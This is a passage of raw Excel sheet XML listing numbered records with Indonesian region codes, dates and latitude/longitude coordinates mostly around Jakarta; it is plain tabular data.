        <v>-6.13141,106.77794</v>
      </c>
    </row>
    <row r="1867" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1867">
        <v>152401</v>
      </c>
      <c r="B1867" s="1">
        <v>43887</v>
      </c>
      <c r="C1867">
        <v>0</v>
      </c>
      <c r="D1867" t="s">
        <v>22</v>
      </c>
      <c r="E1867" t="s">
        <v>23</v>
      </c>
      <c r="F1867" t="s">
        <v>6241</v>
      </c>
      <c r="G1867" t="s">
        <v>6242</v>
      </c>
      <c r="H1867" t="s">
        <v>26</v>
      </c>
      <c r="I1867" t="s">
        <v>517</v>
      </c>
      <c r="J1867" t="s">
        <v>2608</v>
      </c>
      <c r="L1867" t="s">
        <v>6243</v>
      </c>
      <c r="M1867">
        <v>3326160011</v>
      </c>
      <c r="N1867">
        <v>3326160</v>
      </c>
      <c r="O1867">
        <v>3326</v>
      </c>
      <c r="P1867">
        <v>33</v>
      </c>
      <c r="Q1867" t="s">
        <v>6244</v>
      </c>
      <c r="R1867" t="s">
        <v>6245</v>
      </c>
      <c r="S1867" t="s">
        <v>6246</v>
      </c>
      <c r="T1867" t="s">
        <v>1134</v>
      </c>
      <c r="U1867" s="5">
        <v>10962028</v>
      </c>
      <c r="V1867" s="5" t="s">
        <v>16115</v>
      </c>
      <c r="W1867" s="5">
        <v>-689094</v>
      </c>
      <c r="X1867" t="s">
        <v>19871</v>
      </c>
      <c r="Y1867" t="str">
        <f t="shared" si="29"/>
        <v>-6.89094,109.62028</v>
      </c>
    </row>
    <row r="1868" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1868">
        <v>153918</v>
      </c>
      <c r="B1868" s="1">
        <v>43887</v>
      </c>
      <c r="C1868">
        <v>0</v>
      </c>
      <c r="D1868" t="s">
        <v>22</v>
      </c>
      <c r="E1868" t="s">
        <v>23</v>
      </c>
      <c r="F1868" t="s">
        <v>6247</v>
      </c>
      <c r="G1868" t="s">
        <v>6248</v>
      </c>
      <c r="H1868" t="s">
        <v>26</v>
      </c>
      <c r="I1868" t="s">
        <v>534</v>
      </c>
      <c r="J1868" t="s">
        <v>2627</v>
      </c>
      <c r="L1868" t="s">
        <v>6249</v>
      </c>
      <c r="M1868">
        <v>3275061004</v>
      </c>
      <c r="N1868">
        <v>3275061</v>
      </c>
      <c r="O1868">
        <v>3275</v>
      </c>
      <c r="P1868">
        <v>32</v>
      </c>
      <c r="Q1868" t="s">
        <v>39</v>
      </c>
      <c r="R1868" t="s">
        <v>40</v>
      </c>
      <c r="S1868" t="s">
        <v>41</v>
      </c>
      <c r="T1868" t="s">
        <v>42</v>
      </c>
      <c r="U1868" s="5">
        <v>10697981</v>
      </c>
      <c r="V1868" s="5" t="s">
        <v>16116</v>
      </c>
      <c r="W1868" s="5">
        <v>-617295</v>
      </c>
      <c r="X1868" t="s">
        <v>18757</v>
      </c>
      <c r="Y1868" t="str">
        <f t="shared" si="29"/>
        <v>-6.17295,106.97981</v>
      </c>
    </row>
    <row r="1869" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1869">
        <v>154969</v>
      </c>
      <c r="B1869" s="1">
        <v>43887</v>
      </c>
      <c r="C1869">
        <v>0</v>
      </c>
      <c r="D1869" t="s">
        <v>2648</v>
      </c>
      <c r="E1869" t="s">
        <v>23</v>
      </c>
      <c r="G1869" t="s">
        <v>6250</v>
      </c>
      <c r="H1869" t="s">
        <v>26</v>
      </c>
      <c r="I1869" t="s">
        <v>103</v>
      </c>
      <c r="J1869" t="s">
        <v>863</v>
      </c>
      <c r="L1869" t="s">
        <v>6251</v>
      </c>
      <c r="M1869">
        <v>3175010003</v>
      </c>
      <c r="N1869">
        <v>3175010</v>
      </c>
      <c r="O1869">
        <v>3175</v>
      </c>
      <c r="P1869">
        <v>31</v>
      </c>
      <c r="Q1869" t="s">
        <v>545</v>
      </c>
      <c r="R1869" t="s">
        <v>546</v>
      </c>
      <c r="S1869" t="s">
        <v>547</v>
      </c>
      <c r="T1869" t="s">
        <v>33</v>
      </c>
      <c r="U1869" s="5">
        <v>10678388</v>
      </c>
      <c r="V1869" s="5" t="s">
        <v>16117</v>
      </c>
      <c r="W1869" s="5">
        <v>-613483</v>
      </c>
      <c r="X1869" t="s">
        <v>19872</v>
      </c>
      <c r="Y1869" t="str">
        <f t="shared" si="29"/>
        <v>-6.13483,106.78388</v>
      </c>
    </row>
    <row r="1870" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1870">
        <v>155593</v>
      </c>
      <c r="B1870" s="1">
        <v>43887</v>
      </c>
      <c r="C1870">
        <v>0</v>
      </c>
      <c r="D1870" t="s">
        <v>22</v>
      </c>
      <c r="E1870" t="s">
        <v>23</v>
      </c>
      <c r="F1870" t="s">
        <v>6252</v>
      </c>
      <c r="G1870" t="s">
        <v>6253</v>
      </c>
      <c r="H1870" t="s">
        <v>26</v>
      </c>
      <c r="I1870" t="s">
        <v>2165</v>
      </c>
      <c r="J1870" t="s">
        <v>543</v>
      </c>
      <c r="L1870" t="s">
        <v>6254</v>
      </c>
      <c r="M1870">
        <v>3175010003</v>
      </c>
      <c r="N1870">
        <v>3175010</v>
      </c>
      <c r="O1870">
        <v>3175</v>
      </c>
      <c r="P1870">
        <v>31</v>
      </c>
      <c r="Q1870" t="s">
        <v>545</v>
      </c>
      <c r="R1870" t="s">
        <v>546</v>
      </c>
      <c r="S1870" t="s">
        <v>547</v>
      </c>
      <c r="T1870" t="s">
        <v>33</v>
      </c>
      <c r="U1870" s="5">
        <v>10678113</v>
      </c>
      <c r="V1870" s="5" t="s">
        <v>16118</v>
      </c>
      <c r="W1870" s="5">
        <v>-613751</v>
      </c>
      <c r="X1870" t="s">
        <v>19873</v>
      </c>
      <c r="Y1870" t="str">
        <f t="shared" si="29"/>
        <v>-6.13751,106.78113</v>
      </c>
    </row>
    <row r="1871" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1871">
        <v>155696</v>
      </c>
      <c r="B1871" s="1">
        <v>43887</v>
      </c>
      <c r="C1871">
        <v>0</v>
      </c>
      <c r="D1871" t="s">
        <v>22</v>
      </c>
      <c r="E1871" t="s">
        <v>23</v>
      </c>
      <c r="F1871" t="s">
        <v>6255</v>
      </c>
      <c r="H1871" t="s">
        <v>26</v>
      </c>
      <c r="I1871" t="s">
        <v>2293</v>
      </c>
      <c r="J1871" t="s">
        <v>2627</v>
      </c>
      <c r="L1871" t="s">
        <v>6256</v>
      </c>
      <c r="M1871">
        <v>3213220009</v>
      </c>
      <c r="N1871">
        <v>3213220</v>
      </c>
      <c r="O1871">
        <v>3213</v>
      </c>
      <c r="P1871">
        <v>32</v>
      </c>
      <c r="Q1871" t="s">
        <v>6257</v>
      </c>
      <c r="R1871" t="s">
        <v>6258</v>
      </c>
      <c r="S1871" t="s">
        <v>5179</v>
      </c>
      <c r="T1871" t="s">
        <v>42</v>
      </c>
      <c r="U1871" s="5">
        <v>10772661</v>
      </c>
      <c r="V1871" s="5" t="s">
        <v>16119</v>
      </c>
      <c r="W1871" s="5">
        <v>-624380</v>
      </c>
      <c r="X1871" t="s">
        <v>19874</v>
      </c>
      <c r="Y1871" t="str">
        <f t="shared" si="29"/>
        <v>-6.24380,107.72661</v>
      </c>
    </row>
    <row r="1872" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1872">
        <v>155802</v>
      </c>
      <c r="B1872" s="1">
        <v>43887</v>
      </c>
      <c r="C1872">
        <v>0</v>
      </c>
      <c r="D1872" t="s">
        <v>2648</v>
      </c>
      <c r="E1872" t="s">
        <v>23</v>
      </c>
      <c r="G1872" t="s">
        <v>6259</v>
      </c>
      <c r="H1872" t="s">
        <v>26</v>
      </c>
      <c r="I1872" t="s">
        <v>103</v>
      </c>
      <c r="J1872" t="s">
        <v>6260</v>
      </c>
      <c r="L1872" t="s">
        <v>6261</v>
      </c>
      <c r="M1872">
        <v>3174070006</v>
      </c>
      <c r="N1872">
        <v>3174070</v>
      </c>
      <c r="O1872">
        <v>3174</v>
      </c>
      <c r="P1872">
        <v>31</v>
      </c>
      <c r="Q1872" t="s">
        <v>595</v>
      </c>
      <c r="R1872" t="s">
        <v>84</v>
      </c>
      <c r="S1872" t="s">
        <v>32</v>
      </c>
      <c r="T1872" t="s">
        <v>33</v>
      </c>
      <c r="U1872" s="5">
        <v>10671879</v>
      </c>
      <c r="V1872" s="5" t="s">
        <v>16120</v>
      </c>
      <c r="W1872" s="5">
        <v>-613340</v>
      </c>
      <c r="X1872" t="s">
        <v>19875</v>
      </c>
      <c r="Y1872" t="str">
        <f t="shared" si="29"/>
        <v>-6.13340,106.71879</v>
      </c>
    </row>
    <row r="1873" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1873">
        <v>156534</v>
      </c>
      <c r="B1873" s="1">
        <v>43887</v>
      </c>
      <c r="C1873">
        <v>0</v>
      </c>
      <c r="D1873" t="s">
        <v>2648</v>
      </c>
      <c r="E1873" t="s">
        <v>23</v>
      </c>
      <c r="G1873" t="s">
        <v>6262</v>
      </c>
      <c r="H1873" t="s">
        <v>26</v>
      </c>
      <c r="I1873" t="s">
        <v>710</v>
      </c>
      <c r="J1873" t="s">
        <v>543</v>
      </c>
      <c r="L1873" t="s">
        <v>6263</v>
      </c>
      <c r="M1873">
        <v>3175010003</v>
      </c>
      <c r="N1873">
        <v>3175010</v>
      </c>
      <c r="O1873">
        <v>3175</v>
      </c>
      <c r="P1873">
        <v>31</v>
      </c>
      <c r="Q1873" t="s">
        <v>545</v>
      </c>
      <c r="R1873" t="s">
        <v>546</v>
      </c>
      <c r="S1873" t="s">
        <v>547</v>
      </c>
      <c r="T1873" t="s">
        <v>33</v>
      </c>
      <c r="U1873" s="5">
        <v>10677963</v>
      </c>
      <c r="V1873" s="5" t="s">
        <v>16121</v>
      </c>
      <c r="W1873" s="5">
        <v>-613666</v>
      </c>
      <c r="X1873" t="s">
        <v>19876</v>
      </c>
      <c r="Y1873" t="str">
        <f t="shared" si="29"/>
        <v>-6.13666,106.77963</v>
      </c>
    </row>
    <row r="1874" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1874">
        <v>156718</v>
      </c>
      <c r="B1874" s="1">
        <v>43887</v>
      </c>
      <c r="C1874">
        <v>0</v>
      </c>
      <c r="D1874" t="s">
        <v>22</v>
      </c>
      <c r="E1874" t="s">
        <v>23</v>
      </c>
      <c r="F1874" t="s">
        <v>6264</v>
      </c>
      <c r="G1874" t="s">
        <v>6265</v>
      </c>
      <c r="H1874" t="s">
        <v>26</v>
      </c>
      <c r="I1874" t="s">
        <v>6266</v>
      </c>
      <c r="J1874" t="s">
        <v>863</v>
      </c>
      <c r="L1874" t="s">
        <v>6267</v>
      </c>
      <c r="M1874">
        <v>3175010003</v>
      </c>
      <c r="N1874">
        <v>3175010</v>
      </c>
      <c r="O1874">
        <v>3175</v>
      </c>
      <c r="P1874">
        <v>31</v>
      </c>
      <c r="Q1874" t="s">
        <v>545</v>
      </c>
      <c r="R1874" t="s">
        <v>546</v>
      </c>
      <c r="S1874" t="s">
        <v>547</v>
      </c>
      <c r="T1874" t="s">
        <v>33</v>
      </c>
      <c r="U1874" s="5">
        <v>10678210</v>
      </c>
      <c r="V1874" s="5" t="s">
        <v>16122</v>
      </c>
      <c r="W1874" s="5">
        <v>-613625</v>
      </c>
      <c r="X1874" t="s">
        <v>19877</v>
      </c>
      <c r="Y1874" t="str">
        <f t="shared" si="29"/>
        <v>-6.13625,106.78210</v>
      </c>
    </row>
    <row r="1875" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1875">
        <v>158304</v>
      </c>
      <c r="B1875" s="1">
        <v>43887</v>
      </c>
      <c r="C1875">
        <v>0</v>
      </c>
      <c r="D1875" t="s">
        <v>85</v>
      </c>
      <c r="E1875" t="s">
        <v>23</v>
      </c>
      <c r="F1875" t="s">
        <v>6268</v>
      </c>
      <c r="G1875" t="s">
        <v>6269</v>
      </c>
      <c r="H1875" t="s">
        <v>26</v>
      </c>
      <c r="I1875" t="s">
        <v>103</v>
      </c>
      <c r="J1875" t="s">
        <v>6270</v>
      </c>
      <c r="K1875" t="s">
        <v>6271</v>
      </c>
      <c r="L1875" t="s">
        <v>6272</v>
      </c>
      <c r="M1875">
        <v>3171060003</v>
      </c>
      <c r="N1875">
        <v>3171060</v>
      </c>
      <c r="O1875">
        <v>3171</v>
      </c>
      <c r="P1875">
        <v>31</v>
      </c>
      <c r="Q1875" t="s">
        <v>5000</v>
      </c>
      <c r="R1875" t="s">
        <v>1236</v>
      </c>
      <c r="S1875" t="s">
        <v>108</v>
      </c>
      <c r="T1875" t="s">
        <v>33</v>
      </c>
      <c r="U1875" s="5">
        <v>10680779</v>
      </c>
      <c r="V1875" s="5" t="s">
        <v>16123</v>
      </c>
      <c r="W1875" s="5">
        <v>-625360</v>
      </c>
      <c r="X1875" t="s">
        <v>19878</v>
      </c>
      <c r="Y1875" t="str">
        <f t="shared" si="29"/>
        <v>-6.25360,106.80779</v>
      </c>
    </row>
    <row r="1876" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1876">
        <v>158458</v>
      </c>
      <c r="B1876" s="1">
        <v>43887</v>
      </c>
      <c r="C1876">
        <v>0</v>
      </c>
      <c r="D1876" t="s">
        <v>22</v>
      </c>
      <c r="E1876" t="s">
        <v>23</v>
      </c>
      <c r="F1876" t="s">
        <v>6273</v>
      </c>
      <c r="G1876" t="s">
        <v>6274</v>
      </c>
      <c r="H1876" t="s">
        <v>26</v>
      </c>
      <c r="I1876" t="s">
        <v>1542</v>
      </c>
      <c r="J1876" t="s">
        <v>2627</v>
      </c>
      <c r="L1876" t="s">
        <v>6275</v>
      </c>
      <c r="M1876">
        <v>3216081009</v>
      </c>
      <c r="N1876">
        <v>3216081</v>
      </c>
      <c r="O1876">
        <v>3216</v>
      </c>
      <c r="P1876">
        <v>32</v>
      </c>
      <c r="Q1876" t="s">
        <v>4111</v>
      </c>
      <c r="R1876" t="s">
        <v>2512</v>
      </c>
      <c r="S1876" t="s">
        <v>41</v>
      </c>
      <c r="T1876" t="s">
        <v>42</v>
      </c>
      <c r="U1876" s="5">
        <v>10705494</v>
      </c>
      <c r="V1876" s="5" t="s">
        <v>16124</v>
      </c>
      <c r="W1876" s="5">
        <v>-624470</v>
      </c>
      <c r="X1876" t="s">
        <v>19879</v>
      </c>
      <c r="Y1876" t="str">
        <f t="shared" si="29"/>
        <v>-6.24470,107.05494</v>
      </c>
    </row>
    <row r="1877" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1877">
        <v>158865</v>
      </c>
      <c r="B1877" s="1">
        <v>43887</v>
      </c>
      <c r="C1877">
        <v>0</v>
      </c>
      <c r="D1877" t="s">
        <v>22</v>
      </c>
      <c r="E1877" t="s">
        <v>23</v>
      </c>
      <c r="F1877" t="s">
        <v>6276</v>
      </c>
      <c r="G1877" t="s">
        <v>6277</v>
      </c>
      <c r="H1877" t="s">
        <v>26</v>
      </c>
      <c r="I1877" t="s">
        <v>6278</v>
      </c>
      <c r="J1877" t="s">
        <v>6214</v>
      </c>
      <c r="L1877" t="s">
        <v>6279</v>
      </c>
      <c r="M1877">
        <v>3174010005</v>
      </c>
      <c r="N1877">
        <v>3174010</v>
      </c>
      <c r="O1877">
        <v>3174</v>
      </c>
      <c r="P1877">
        <v>31</v>
      </c>
      <c r="Q1877" t="s">
        <v>251</v>
      </c>
      <c r="R1877" t="s">
        <v>69</v>
      </c>
      <c r="S1877" t="s">
        <v>32</v>
      </c>
      <c r="T1877" t="s">
        <v>33</v>
      </c>
      <c r="U1877" s="5">
        <v>10672974</v>
      </c>
      <c r="V1877" s="5" t="s">
        <v>16125</v>
      </c>
      <c r="W1877" s="5">
        <v>-618515</v>
      </c>
      <c r="X1877" t="s">
        <v>19880</v>
      </c>
      <c r="Y1877" t="str">
        <f t="shared" si="29"/>
        <v>-6.18515,106.72974</v>
      </c>
    </row>
    <row r="1878" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1878">
        <v>159241</v>
      </c>
      <c r="B1878" s="1">
        <v>43887</v>
      </c>
      <c r="C1878">
        <v>0</v>
      </c>
      <c r="D1878" t="s">
        <v>22</v>
      </c>
      <c r="E1878" t="s">
        <v>23</v>
      </c>
      <c r="F1878" t="s">
        <v>6280</v>
      </c>
      <c r="H1878" t="s">
        <v>26</v>
      </c>
      <c r="I1878" t="s">
        <v>2028</v>
      </c>
      <c r="J1878" t="s">
        <v>863</v>
      </c>
      <c r="L1878" t="s">
        <v>6281</v>
      </c>
      <c r="M1878">
        <v>3175010003</v>
      </c>
      <c r="N1878">
        <v>3175010</v>
      </c>
      <c r="O1878">
        <v>3175</v>
      </c>
      <c r="P1878">
        <v>31</v>
      </c>
      <c r="Q1878" t="s">
        <v>545</v>
      </c>
      <c r="R1878" t="s">
        <v>546</v>
      </c>
      <c r="S1878" t="s">
        <v>547</v>
      </c>
      <c r="T1878" t="s">
        <v>33</v>
      </c>
      <c r="U1878" s="5">
        <v>10678212</v>
      </c>
      <c r="V1878" s="5" t="s">
        <v>16126</v>
      </c>
      <c r="W1878" s="5">
        <v>-613684</v>
      </c>
      <c r="X1878" t="s">
        <v>19881</v>
      </c>
      <c r="Y1878" t="str">
        <f t="shared" si="29"/>
        <v>-6.13684,106.78212</v>
      </c>
    </row>
    <row r="1879" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1879">
        <v>159336</v>
      </c>
      <c r="B1879" s="1">
        <v>43887</v>
      </c>
      <c r="C1879">
        <v>0</v>
      </c>
      <c r="D1879" t="s">
        <v>85</v>
      </c>
      <c r="E1879" t="s">
        <v>23</v>
      </c>
      <c r="F1879" t="s">
        <v>6282</v>
      </c>
      <c r="G1879" t="s">
        <v>6283</v>
      </c>
      <c r="H1879" t="s">
        <v>26</v>
      </c>
      <c r="J1879" t="s">
        <v>5320</v>
      </c>
      <c r="K1879" t="s">
        <v>6284</v>
      </c>
      <c r="L1879" t="s">
        <v>6285</v>
      </c>
      <c r="M1879">
        <v>3173060008</v>
      </c>
      <c r="N1879">
        <v>3173060</v>
      </c>
      <c r="O1879">
        <v>3173</v>
      </c>
      <c r="P1879">
        <v>31</v>
      </c>
      <c r="Q1879" t="s">
        <v>329</v>
      </c>
      <c r="R1879" t="s">
        <v>61</v>
      </c>
      <c r="S1879" t="s">
        <v>62</v>
      </c>
      <c r="T1879" t="s">
        <v>33</v>
      </c>
      <c r="U1879" s="5">
        <v>10684712</v>
      </c>
      <c r="V1879" s="5" t="s">
        <v>16127</v>
      </c>
      <c r="W1879" s="5">
        <v>-615424</v>
      </c>
      <c r="X1879" t="s">
        <v>19882</v>
      </c>
      <c r="Y1879" t="str">
        <f t="shared" si="29"/>
        <v>-6.15424,106.84712</v>
      </c>
    </row>
    <row r="1880" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1880">
        <v>159892</v>
      </c>
      <c r="B1880" s="1">
        <v>43887</v>
      </c>
      <c r="C1880">
        <v>0</v>
      </c>
      <c r="D1880" t="s">
        <v>85</v>
      </c>
      <c r="E1880" t="s">
        <v>23</v>
      </c>
      <c r="F1880" t="s">
        <v>6286</v>
      </c>
      <c r="G1880" t="s">
        <v>6287</v>
      </c>
      <c r="H1880" t="s">
        <v>26</v>
      </c>
      <c r="I1880" t="s">
        <v>6211</v>
      </c>
      <c r="J1880" t="s">
        <v>5320</v>
      </c>
      <c r="K1880" t="s">
        <v>6288</v>
      </c>
      <c r="L1880" t="s">
        <v>6289</v>
      </c>
      <c r="M1880">
        <v>3173060008</v>
      </c>
      <c r="N1880">
        <v>3173060</v>
      </c>
      <c r="O1880">
        <v>3173</v>
      </c>
      <c r="P1880">
        <v>31</v>
      </c>
      <c r="Q1880" t="s">
        <v>329</v>
      </c>
      <c r="R1880" t="s">
        <v>61</v>
      </c>
      <c r="S1880" t="s">
        <v>62</v>
      </c>
      <c r="T1880" t="s">
        <v>33</v>
      </c>
      <c r="U1880" s="5">
        <v>10685004</v>
      </c>
      <c r="V1880" s="5" t="s">
        <v>16128</v>
      </c>
      <c r="W1880" s="5">
        <v>-615595</v>
      </c>
      <c r="X1880" t="s">
        <v>19883</v>
      </c>
      <c r="Y1880" t="str">
        <f t="shared" si="29"/>
        <v>-6.15595,106.85004</v>
      </c>
    </row>
    <row r="1881" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1881">
        <v>160792</v>
      </c>
      <c r="B1881" s="1">
        <v>43887</v>
      </c>
      <c r="C1881">
        <v>0</v>
      </c>
      <c r="D1881" t="s">
        <v>22</v>
      </c>
      <c r="E1881" t="s">
        <v>23</v>
      </c>
      <c r="F1881" t="s">
        <v>6290</v>
      </c>
      <c r="G1881" t="s">
        <v>6291</v>
      </c>
      <c r="H1881" t="s">
        <v>26</v>
      </c>
      <c r="I1881" t="s">
        <v>6292</v>
      </c>
      <c r="J1881" t="s">
        <v>6293</v>
      </c>
      <c r="L1881" t="s">
        <v>6294</v>
      </c>
      <c r="M1881">
        <v>3172050005</v>
      </c>
      <c r="N1881">
        <v>3172050</v>
      </c>
      <c r="O1881">
        <v>3172</v>
      </c>
      <c r="P1881">
        <v>31</v>
      </c>
      <c r="Q1881" t="s">
        <v>358</v>
      </c>
      <c r="R1881" t="s">
        <v>358</v>
      </c>
      <c r="S1881" t="s">
        <v>49</v>
      </c>
      <c r="T1881" t="s">
        <v>33</v>
      </c>
      <c r="U1881" s="5">
        <v>10687353</v>
      </c>
      <c r="V1881" s="5" t="s">
        <v>16129</v>
      </c>
      <c r="W1881" s="5">
        <v>-628599</v>
      </c>
      <c r="X1881" t="s">
        <v>19884</v>
      </c>
      <c r="Y1881" t="str">
        <f t="shared" si="29"/>
        <v>-6.28599,106.87353</v>
      </c>
    </row>
    <row r="1882" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1882">
        <v>162756</v>
      </c>
      <c r="B1882" s="1">
        <v>43887</v>
      </c>
      <c r="C1882">
        <v>0</v>
      </c>
      <c r="D1882" t="s">
        <v>22</v>
      </c>
      <c r="E1882" t="s">
        <v>23</v>
      </c>
      <c r="F1882" t="s">
        <v>6295</v>
      </c>
      <c r="G1882" t="s">
        <v>6296</v>
      </c>
      <c r="H1882" t="s">
        <v>26</v>
      </c>
      <c r="I1882" t="s">
        <v>1433</v>
      </c>
      <c r="J1882" t="s">
        <v>3135</v>
      </c>
      <c r="L1882" t="s">
        <v>6297</v>
      </c>
      <c r="M1882">
        <v>3671042002</v>
      </c>
      <c r="N1882">
        <v>3671042</v>
      </c>
      <c r="O1882">
        <v>3671</v>
      </c>
      <c r="P1882">
        <v>36</v>
      </c>
      <c r="Q1882" t="s">
        <v>2101</v>
      </c>
      <c r="R1882" t="s">
        <v>2102</v>
      </c>
      <c r="S1882" t="s">
        <v>201</v>
      </c>
      <c r="T1882" t="s">
        <v>171</v>
      </c>
      <c r="U1882" s="5">
        <v>10659270</v>
      </c>
      <c r="V1882" s="5" t="s">
        <v>16130</v>
      </c>
      <c r="W1882" s="5">
        <v>-616578</v>
      </c>
      <c r="X1882" t="s">
        <v>19885</v>
      </c>
      <c r="Y1882" t="str">
        <f t="shared" si="29"/>
        <v>-6.16578,106.59270</v>
      </c>
    </row>
    <row r="1883" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1883">
        <v>162939</v>
      </c>
      <c r="B1883" s="1">
        <v>43887</v>
      </c>
      <c r="C1883">
        <v>0</v>
      </c>
      <c r="D1883" t="s">
        <v>22</v>
      </c>
      <c r="E1883" t="s">
        <v>23</v>
      </c>
      <c r="F1883" t="s">
        <v>6298</v>
      </c>
      <c r="G1883" t="s">
        <v>6299</v>
      </c>
      <c r="H1883" t="s">
        <v>26</v>
      </c>
      <c r="I1883" t="s">
        <v>6300</v>
      </c>
      <c r="J1883" t="s">
        <v>6301</v>
      </c>
      <c r="L1883" t="s">
        <v>6302</v>
      </c>
      <c r="M1883">
        <v>3172080003</v>
      </c>
      <c r="N1883">
        <v>3172080</v>
      </c>
      <c r="O1883">
        <v>3172</v>
      </c>
      <c r="P1883">
        <v>31</v>
      </c>
      <c r="Q1883" t="s">
        <v>2250</v>
      </c>
      <c r="R1883" t="s">
        <v>141</v>
      </c>
      <c r="S1883" t="s">
        <v>49</v>
      </c>
      <c r="T1883" t="s">
        <v>33</v>
      </c>
      <c r="U1883" s="5">
        <v>10694641</v>
      </c>
      <c r="V1883" s="5" t="s">
        <v>15408</v>
      </c>
      <c r="W1883" s="5">
        <v>-619819</v>
      </c>
      <c r="X1883" t="s">
        <v>19886</v>
      </c>
      <c r="Y1883" t="str">
        <f t="shared" si="29"/>
        <v>-6.19819,106.94641</v>
      </c>
    </row>
    <row r="1884" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1884">
        <v>163449</v>
      </c>
      <c r="B1884" s="1">
        <v>43887</v>
      </c>
      <c r="C1884">
        <v>1</v>
      </c>
      <c r="D1884" t="s">
        <v>22</v>
      </c>
      <c r="E1884" t="s">
        <v>23</v>
      </c>
      <c r="F1884" t="s">
        <v>6303</v>
      </c>
      <c r="G1884" t="s">
        <v>6304</v>
      </c>
      <c r="H1884" t="s">
        <v>26</v>
      </c>
      <c r="I1884" t="s">
        <v>27</v>
      </c>
      <c r="J1884" t="s">
        <v>2622</v>
      </c>
      <c r="L1884" t="s">
        <v>6305</v>
      </c>
      <c r="M1884">
        <v>3578240005</v>
      </c>
      <c r="N1884">
        <v>3578240</v>
      </c>
      <c r="O1884">
        <v>3578</v>
      </c>
      <c r="P1884">
        <v>35</v>
      </c>
      <c r="Q1884" t="s">
        <v>6306</v>
      </c>
      <c r="R1884" t="s">
        <v>6307</v>
      </c>
      <c r="S1884" t="s">
        <v>1346</v>
      </c>
      <c r="T1884" t="s">
        <v>1221</v>
      </c>
      <c r="U1884" s="5">
        <v>11273427</v>
      </c>
      <c r="V1884" s="5" t="s">
        <v>16131</v>
      </c>
      <c r="W1884" s="5">
        <v>-721586</v>
      </c>
      <c r="X1884" t="s">
        <v>19887</v>
      </c>
      <c r="Y1884" t="str">
        <f t="shared" si="29"/>
        <v>-7.21586,112.73427</v>
      </c>
    </row>
    <row r="1885" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1885">
        <v>165248</v>
      </c>
      <c r="B1885" s="1">
        <v>43887</v>
      </c>
      <c r="C1885">
        <v>1</v>
      </c>
      <c r="D1885" t="s">
        <v>22</v>
      </c>
      <c r="E1885" t="s">
        <v>23</v>
      </c>
      <c r="F1885" t="s">
        <v>6308</v>
      </c>
      <c r="H1885" t="s">
        <v>26</v>
      </c>
      <c r="I1885" t="s">
        <v>2962</v>
      </c>
      <c r="J1885" t="s">
        <v>6309</v>
      </c>
      <c r="L1885" t="s">
        <v>6310</v>
      </c>
      <c r="M1885">
        <v>3171100003</v>
      </c>
      <c r="N1885">
        <v>3171100</v>
      </c>
      <c r="O1885">
        <v>3171</v>
      </c>
      <c r="P1885">
        <v>31</v>
      </c>
      <c r="Q1885" t="s">
        <v>3246</v>
      </c>
      <c r="R1885" t="s">
        <v>107</v>
      </c>
      <c r="S1885" t="s">
        <v>108</v>
      </c>
      <c r="T1885" t="s">
        <v>33</v>
      </c>
      <c r="U1885" s="5">
        <v>10682184</v>
      </c>
      <c r="V1885" s="5" t="s">
        <v>15209</v>
      </c>
      <c r="W1885" s="5">
        <v>-621848</v>
      </c>
      <c r="X1885" t="s">
        <v>19888</v>
      </c>
      <c r="Y1885" t="str">
        <f t="shared" si="29"/>
        <v>-6.21848,106.82184</v>
      </c>
    </row>
    <row r="1886" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1886">
        <v>166222</v>
      </c>
      <c r="B1886" s="1">
        <v>43887</v>
      </c>
      <c r="C1886">
        <v>1</v>
      </c>
      <c r="D1886" t="s">
        <v>22</v>
      </c>
      <c r="E1886" t="s">
        <v>23</v>
      </c>
      <c r="F1886" t="s">
        <v>6311</v>
      </c>
      <c r="G1886" t="s">
        <v>6312</v>
      </c>
      <c r="H1886" t="s">
        <v>26</v>
      </c>
      <c r="I1886" t="s">
        <v>784</v>
      </c>
      <c r="J1886" t="s">
        <v>2608</v>
      </c>
      <c r="L1886" t="s">
        <v>6313</v>
      </c>
      <c r="M1886">
        <v>3310050011</v>
      </c>
      <c r="N1886">
        <v>3310050</v>
      </c>
      <c r="O1886">
        <v>3310</v>
      </c>
      <c r="P1886">
        <v>33</v>
      </c>
      <c r="Q1886" t="s">
        <v>6314</v>
      </c>
      <c r="R1886" t="s">
        <v>6314</v>
      </c>
      <c r="S1886" t="s">
        <v>6315</v>
      </c>
      <c r="T1886" t="s">
        <v>1134</v>
      </c>
      <c r="U1886" s="5">
        <v>11069473</v>
      </c>
      <c r="V1886" s="5" t="s">
        <v>16132</v>
      </c>
      <c r="W1886" s="5">
        <v>-775713</v>
      </c>
      <c r="X1886" t="s">
        <v>19889</v>
      </c>
      <c r="Y1886" t="str">
        <f t="shared" si="29"/>
        <v>-7.75713,110.69473</v>
      </c>
    </row>
    <row r="1887" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1887">
        <v>166247</v>
      </c>
      <c r="B1887" s="1">
        <v>43887</v>
      </c>
      <c r="C1887">
        <v>1</v>
      </c>
      <c r="D1887" t="s">
        <v>22</v>
      </c>
      <c r="E1887" t="s">
        <v>23</v>
      </c>
      <c r="F1887" t="s">
        <v>6316</v>
      </c>
      <c r="H1887" t="s">
        <v>26</v>
      </c>
      <c r="I1887" t="s">
        <v>6317</v>
      </c>
      <c r="J1887" t="s">
        <v>2622</v>
      </c>
      <c r="L1887" t="s">
        <v>6318</v>
      </c>
      <c r="M1887">
        <v>3507070009</v>
      </c>
      <c r="N1887">
        <v>3507070</v>
      </c>
      <c r="O1887">
        <v>3507</v>
      </c>
      <c r="P1887">
        <v>35</v>
      </c>
